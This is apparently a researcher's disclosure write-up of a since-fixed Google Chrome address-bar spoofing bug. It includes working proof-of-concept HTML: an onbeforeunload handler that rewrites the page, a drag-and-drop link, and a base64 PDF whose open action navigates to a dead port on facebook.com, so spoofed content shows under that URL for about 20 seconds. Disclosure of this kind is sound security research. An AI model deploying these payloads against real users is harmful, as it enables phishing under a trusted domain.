Google Chrome Address Bar Spoof


The PoC

At first I noticed that if you manually navigated within Google Chrome to a website with a non-existent port like 'https://www.facebook.com:82', there was a ~20 second window where the document did not change and yet the URL had changed in the omnibox. Tricking a user into typing out the URL manually is a stretch, so I instead reported a PoC relying on the drag and drop action. This ended up being a 'WontFix' bug, as the drag and drop action was too much user interaction according to Google.

The following is the original PoC reported:

<!-- Runs once the navigation to the spoofed URL starts (the page is about to
     be unloaded): replace the visible content and title with attacker-chosen
     text while the omnibox already shows the target URL. -->
<script>
onbeforeunload=function(){
	document.write('<b>Welcome to {Some Website}</b>');
	document.title='OtherWebsite.ltd';
};
</script>
<!-- Clicking never navigates (return false); the user has to drag the link
     into the omnibox, which starts a navigation to a port that never answers. -->
<a href="https://www.facebook.com:82" onclick="alert('Please drag and drop this into the address bar of this window');return false;">Drag and drop me!</a>
<br>

I still thought there was something interesting about the behavior, so I went looking for a better way. I was trying to think of ways to redirect a page to another, and one of the ideas that came up was a PDF-based redirect. I remembered that Jun (@shhnjk) had written about PDF redirection, which I specifically recalled changing the URL much faster than a normal anchor navigation, so I set up my PoC and it worked!

<!-- Same unload handler as before: the spoofed content is written once the
     PDF-triggered navigation begins. -->
<script>
onbeforeunload=function(){
	document.write('<b>Welcome to {Some Website}</b>');
	document.title='OtherWebsite.ltd';
};
</script>
<!-- The data: URI is the minimal PDF shown below; its /OpenAction /URI makes
     the PDF viewer navigate the page to https://www.facebook.com:83 as soon as
     it loads, with no click or drag from the user. -->
<embed type="application/pdf" src="data:application/pdf;base64,JVBERi0xLjcKIAp0cmFpbGVyCjw8Ci9Sb290IDEgMCBSCj4+CiAKMSAwIG9iago8PAovVHlwZSAvQ2F0YWxvZwovUGFnZXMgMiAwIFIKL09wZW5BY3Rpb24gMiAwIFIKPj4KZW5kb2JqCiAKMiAwIG9iago8PAovVHlwZSAvQWN0aW9uCi9TIC9VUkkKL1VSSSAoaHR0cDovL3d3dy5mYWNlYm9vay5jb206ODMpCj4+CmVuZG9iagogCiUlRU9G" width="640" height="480">

Source of the embedded PDF, decoded from the data: URI above (object 1 is the catalog, whose /OpenAction points at object 2, a /URI action):
%PDF-1.7
 
trailer
<<
/Root 1 0 R
>>
 
1 0 obj
<<
/Type /Catalog
/Pages 2 0 R
/OpenAction 2 0 R
>>
endobj
 
2 0 obj
<<
/Type /Action
/S /URI
/URI (http://www.facebook.com:83)
>>
endobj
 
%%EOF

The embedded PDF navigates through a different code path than an anchor tag does: the navigation started by the PDF viewer's /OpenAction /URI was missing the safeguard that keeps the omnibox from displaying a new URL until the navigation has actually committed. Since the target is a port on which the server does not respond, the connection attempt hangs until it times out; only after roughly 20 seconds does Chrome show its error page, and 20 seconds is more than enough to trick a user, because during that window the attacker controls both the URL in the omnibox and, via onbeforeunload, the content displayed under it.
This required no user interaction at all, which was as good as can be. This was a good lesson in not giving up on a bug, or perhaps in not reporting bugs too early.

References:

The report: https://bugs.chromium.org/p/chromium/issues/detail?id=660498
Confused Deputy Problem: https://en.wikipedia.org/wiki/Confused_deputy_problem
Google stable channel update fixing this bug: https://chromereleases.googleblog.com/2016/12/stable-channel-update-for-desktop.html